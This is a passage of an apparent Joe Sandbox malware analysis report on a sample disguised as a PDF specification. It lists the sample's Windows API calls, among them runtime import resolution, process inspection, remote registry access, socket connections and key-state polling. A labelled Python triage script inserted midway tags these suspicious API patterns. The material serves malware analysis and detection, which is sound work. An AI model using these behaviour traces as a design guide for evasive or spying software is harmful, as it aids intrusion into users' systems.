                                      • Instruction Fuzzy Hash: 562183716003059BDB22AF699C45FAAB7ECAF45730F280A5AF8A1E72D0F770D841CB50
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000000,003F6F88,7FFFFFFF,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00378C40
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378CBA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378D2C
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378D45
                                        • Part of subcall function 0036395C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378DB6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 1443698708-0
                                      • Opcode ID: 3967cdd121d2f8c060752492e67586b3636d44d5ccdc4fd78ab6c887170f9644
                                      • Instruction ID: cca772bbc7beda74c7ec9f0af8b29ce013dcc54be24cb9b9eeb4b84767b54ebc
                                      • Opcode Fuzzy Hash: 3967cdd121d2f8c060752492e67586b3636d44d5ccdc4fd78ab6c887170f9644
                                      • Instruction Fuzzy Hash: 3D71D471D412169FDF379F648899AEEBBB9EF19360F168119E809A7290DF399C008760
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003A19F3
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003A1A26
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003A1B49
                                      • CloseHandle.KERNEL32(?), ref: 003A1BBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                      • Instruction ID: e0e468090f8d72538a3550f6423969b761733dcd7632f9165b0b91f58d7a2e46
                                      • Opcode Fuzzy Hash: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                      • Instruction Fuzzy Hash: 3A816270600214ABDF12AF64C886FAEBBF5EF49720F148459F905AF3D2D7B4A945CB90
                                      APIs
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003AE1D5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003AE20D
                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 003AE248
                                      • GetWindowLongW.USER32(?,000000EC), ref: 003AE269
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003AE281
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                      • String ID:
                                      • API String ID: 3188977179-0
                                      • Opcode ID: 66d8967331dba783898496f71c3622d9b7d2bc81a5a15cec88153ff965f57511
                                      • Instruction ID: 052b88e8a3d8c41df64aa296796368aabc151d3e3478ad6a5be168bf2ef7819b
                                      • Opcode Fuzzy Hash: 66d8967331dba783898496f71c3622d9b7d2bc81a5a15cec88153ff965f57511
                                      • Instruction Fuzzy Hash: EE61B334A00214AFDB26DF58CC94FAA7BBAEF8A300F154469F9599B3A1C775AD40CB10
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00381CB4
                                      • VariantClear.OLEAUT32(00000013), ref: 00381D26
                                      • VariantClear.OLEAUT32(00000000), ref: 00381D81
                                      • VariantClear.OLEAUT32(?), ref: 00381DF8
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00381E26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                      • Instruction ID: 721b5ebd124825e1bee12e112567ac209890216a61c61233cc0c9ad664937fc0
                                      • Opcode Fuzzy Hash: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                      • Instruction Fuzzy Hash: 105139B5A00209EFDB15DF58C880EAAB7B8FF4C314B158559ED59DB301E730EA56CBA0
                                      APIs
                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003A06EE
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 003A077D
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 003A079B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 003A07E1
                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 003A07FB
                                        • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0038A574,?,?,00000000,00000008), ref: 0035E675
                                        • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0038A574,?,?,00000000,00000008), ref: 0035E699
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                      • String ID:
                                      • API String ID: 666041331-0
                                      • Opcode ID: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                      • Instruction ID: dc69d09052d2851b10356aad45d4c25c05c3ceeecfdee83570e0c288c656f9d1
                                      • Opcode Fuzzy Hash: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                      • Instruction Fuzzy Hash: 60511575A002059FCB06EFA8C481DADB7F9EF59310B058069E916AF362DB71FE45CB90
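The function listings above are the raw material an analyst triages by hand: the block ending here resolves imports at runtime (LoadLibraryW, three GetProcAddress calls, FreeLibrary), another opens a foreign process with access mask 0x410, another connects to a remote registry, and several wire up child-process stdio through CreatePipe and a "nul" handle. The following Python script is an added example, not part of the Joe Sandbox report or of Joe's own tooling. It parses call lines in exactly the form shown on this page ("• Api.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function X:"), groups them per function block, tags each block with API combinations worth a second look, and decodes the OpenProcess access mask from winnt.h constants. The rule names and tag heuristics are the author's own assumptions, the embedded sample text is constructed from lines on this page, and Joe Sandbox's "API ID" / "Opcode ID" hashes are not reproduced.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and tag suspicious API combinations.

Added example; the tagging rules are the author's heuristics, not Joe Sandbox signatures.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One call line. Bullet and "Part of subcall function X:" prefix are optional;
# the API may be an ordinal import such as "#16"; the argument list may be absent.
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{1,8}")


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: int
    subcall_of: Optional[int] = None  # set when Joe lists the call under a callee


@dataclass
class Block:
    opcode_id: Optional[str] = None
    calls: list[Call] = field(default_factory=list)


def parse_report(text: str) -> list[Block]:
    """Split report text into function blocks, one per 'APIs' header."""
    blocks: list[Block] = []
    cur: Optional[Block] = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Block()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
        elif s.startswith("• Opcode ID:"):
            cur.opcode_id = s.split(":", 1)[1].strip()
    return blocks


def base_name(api: str) -> str:
    """Drop the A/W suffix so LoadLibraryW and LoadLibraryA compare equal."""
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


# Heuristic tags (author's assumption: a block earns a tag when it calls every API in the set).
RULES: dict[str, frozenset[str]] = {
    "dynamic-api-resolution": frozenset({"LoadLibrary", "GetProcAddress"}),
    "process-inspection": frozenset({"OpenProcess"}),
    "remote-registry": frozenset({"RegConnectRegistry"}),
    "child-stdio-redirect": frozenset({"CreatePipe", "GetStdHandle"}),
    "winsock-io": frozenset({"select", "WSAGetLastError"}),
    "input-polling": frozenset({"GetAsyncKeyState"}),
}


def tag_block(block: Block, include_subcalls: bool = False) -> list[str]:
    """Tags for a block; by default only the function's own calls count, not callees'."""
    names = {base_name(c.api) for c in block.calls if include_subcalls or c.subcall_of is None}
    return sorted(tag for tag, need in RULES.items() if need <= names)


# OpenProcess desired-access bits from winnt.h, used to read the first argument.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def decode_process_access(mask: int) -> list[str]:
    """Name the known bits of an OpenProcess access mask; unknown bits are kept as hex."""
    names = [n for bit, n in PROCESS_RIGHTS.items() if mask & bit]
    rest = mask & ~sum(PROCESS_RIGHTS)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def triage(text: str) -> list[dict]:
    """One summary row per block: opcode id, call count, tags, decoded OpenProcess masks."""
    rows = []
    for b in parse_report(text):
        access = [" | ".join(decode_process_access(int(c.args[0], 16)))
                  for c in b.calls
                  if base_name(c.api) == "OpenProcess" and c.args and HEX_RE.fullmatch(c.args[0])]
        rows.append({"opcode_id": b.opcode_id, "calls": len(b.calls),
                     "tags": tag_block(b), "process_access": access})
    return rows


# Constructed sample: three blocks excerpted from the report text on this page.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003A19F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 003A1A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003A1B49
• CloseHandle.KERNEL32(?), ref: 003A1BBF
Memory Dump Source
• Opcode ID: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
APIs
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003A06EE
• GetProcAddress.KERNEL32(00000000,?), ref: 003A077D
• FreeLibrary.KERNEL32(00000000,00000004), ref: 003A07FB
  • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,0038A574,00000008), ref: 0035E675
Memory Dump Source
• Opcode ID: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00389588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003895B9
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00389605
Strings
Memory Dump Source
• Opcode ID: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run it against the text of a whole report section and the rows with non-empty tags are the functions to open first; the "Part of subcall function" lines are excluded from tagging by default so that a wrapper is not credited with its callee's behaviour, and 0x410 decodes to PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, which is the minimum needed for GetProcessMemoryInfo rather than a write or injection right.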
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2EEF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A2F2E
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003A2F75
                                      • RegCloseKey.ADVAPI32(?,?), ref: 003A2FA1
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A2FAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 3740051246-0
                                      • Opcode ID: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                      • Instruction ID: b0e0f0f7dcad104d4d5454cdaea41ceadf1b9212221ace56f960d3099a047853
                                      • Opcode Fuzzy Hash: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                      • Instruction Fuzzy Hash: D7515A71218204AFD706EF68C881E6BB7F9FF89304F00892DF5959B2A1DB70E904CB52
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384B5B
                                      • IsMenu.USER32(00000000), ref: 00384B7B
                                      • CreatePopupMenu.USER32 ref: 00384BAF
                                      • GetMenuItemCount.USER32(000000FF), ref: 00384C0D
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00384C3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID:
                                      • API String ID: 93392585-0
                                      • Opcode ID: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                      • Instruction ID: fc8dcc296d8b24523bd26809fefed24bfd2d5203950ba912473613217874c611
                                      • Opcode Fuzzy Hash: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                      • Instruction Fuzzy Hash: A651027060130AEFCF23EF68C888BADBBF8BF44318F1541A9E4559B691E3709944CB51
                                      APIs
                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,003DDC00), ref: 00398E7C
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398E89
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00398EAD
                                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00398EC5
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398F6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$select
                                      • String ID:
                                      • API String ID: 1043644060-0
                                      • Opcode ID: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                      • Instruction ID: 9b774e04f543fa7f34be57d597d1dc2afb4b56d2a935dc5d6ad3fee427b65690
                                      • Opcode Fuzzy Hash: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                      • Instruction Fuzzy Hash: A8419271900204AFCB16EF64DD95EAEB7BDEF49314F104669F5169B291DF70AE00CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                      • Instruction ID: 8667ddfcc76a13f8664d9d1b5e5ba3a372d86b3d1ffa9780c13873cf39f4bd3c
                                      • Opcode Fuzzy Hash: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                      • Instruction Fuzzy Hash: EE41B439910104AFC716DF68CC44FA9BB68EB0A310F161275F959A72E1C730AD51DB90
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003912B4
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003912DD
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0039131C
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00391341
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00391349
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                      • Instruction ID: d5ea258f9cd589abc01ca6d052c3891d8c0e9c3e1c81aa1a8d8d023f00418aa1
                                      • Opcode Fuzzy Hash: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                      • Instruction Fuzzy Hash: 4241FA39600105DFCF02EF64C981AAEBBF5EF09714B1484A9E94AAF362CB31ED01DB51
                                      APIs
                                      • GetCursorPos.USER32(000000FF), ref: 0035B64F
                                      • ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                      • GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                      • GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                      • Instruction ID: 23f2c4054c1bf5edf5604d4a5fc14dbe380e34a5ade12694d2d6999916f53a56
                                      • Opcode Fuzzy Hash: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                      • Instruction Fuzzy Hash: E2413E35608119FBDF1A9F64C844EE9FBB4FB05325F204319F869962A0DB30A994DF91
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 0037B369
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 0037B413
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0037B41B
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 0037B429
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0037B431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                      • Instruction ID: 2c0f25f64db6ec05fbe9d5f808d4f7959c85d2938e0f64cde47fdc1633a08e30
                                      • Opcode Fuzzy Hash: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                      • Instruction Fuzzy Hash: 5B31C07190021DEFEF15CF68D94DB9EBBB9EB04319F118229F825EA1D1C3B49954CB90
                                      APIs
                                        • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00398BD3
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398BE2
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00398BFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 3701255441-0
